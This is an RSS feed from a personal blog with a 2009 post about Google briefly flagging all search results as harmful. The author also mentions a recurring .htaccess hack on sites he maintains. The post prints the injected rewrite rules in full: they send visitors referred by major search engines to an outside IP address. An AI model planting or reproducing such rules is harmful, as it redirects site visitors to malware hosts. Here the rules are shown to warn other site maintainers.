<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>MattMaan &#187; htaccess hack</title>
	<atom:link href="http://mattmaan.com/tag/htaccess-hack/feed/" rel="self" type="application/rss+xml" />
	<link>http://mattmaan.com</link>
	<description>on culture, computers, internet, wordpress, art, music, politics</description>
	<lastBuildDate>Tue, 19 Apr 2011 20:45:11 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=abc</generator>
		<item>
		<title>Google.com Hacked!!! (Saturday January 31, 2009)</title>
		<link>http://mattmaan.com/googlecom-hacked-saturday-january-31-2009/</link>
		<comments>http://mattmaan.com/googlecom-hacked-saturday-january-31-2009/#comments</comments>
		<pubDate>Sat, 31 Jan 2009 15:21:52 +0000</pubDate>
		<dc:creator>mattmaan</dc:creator>
				<category><![CDATA[Computers]]></category>
		<category><![CDATA[Web Design]]></category>
		<category><![CDATA[bizarre results]]></category>
		<category><![CDATA[google]]></category>
		<category><![CDATA[htaccess hack]]></category>
		<category><![CDATA[pain in the ass]]></category>

		<guid isPermaLink="false">http://mattmaan.com/?p=131</guid>
		<description><![CDATA[Saturday, January 31, 2009. Searching Google.com this morning has yielded some bizarre results. Every site is now harmful to your system! How the mighty have fallen. I feel for you googlers. I too check on most of the sites I work on every morning for the .htaccess hack. Quite a pain in the ass. Click [...]]]></description>
			<content:encoded><![CDATA[<p>Saturday, January 31, 2009.</p>
<p>Searching Google.com this morning has yielded some bizarre results. Every site is now harmful to your system! How the mighty have fallen. I feel for you googlers. I too check on most of the sites I work on every morning for the .htaccess hack. Quite a pain in the ass. Click on the image for a closer look. I googled the word &#8220;WORD&#8221;.</p>
<p><a href="http://news.cnet.com/8301-13512_3-10153939-23.html" target="_blank">Read the CNET.com article</a>.</p>
<div id="attachment_132" class="wp-caption aligncenter" style="width: 310px"><a href="http://mattmaan.com/wp-content/uploads/2009/01/google-hacked.jpg"><img class="size-medium wp-image-132" title="google-hacked" src="http://mattmaan.com/wp-content/uploads/2009/01/google-hacked-300x274.jpg" alt="Google.com Hacked?" width="300" height="274" /></a><p class="wp-caption-text">Google.com Hacked?</p></div>
<p>Here&#8217;s my hacker code I wrestle with on a near daily basis:</p>
<p>RewriteEngine On<br />
RewriteCond %{HTTP_REFERER} .*oogle.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*ahoo.*$ [NC]<br />
RewriteRule .* http://89.28.13.213/you.html?s=tube [R,L]</p>
<p><a href="http://www.provos.org/index.php?/categories/1-SpyBye">More on the .htaccess referer hack.</a></p>
<p><a href="http://www.usenix.org/events/sec08/tech/full_papers/small/small_html/index.html">Technical paper (too technical, but interesting article).</a></p>
]]></content:encoded>
			<wfw:commentRss>http://mattmaan.com/googlecom-hacked-saturday-january-31-2009/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

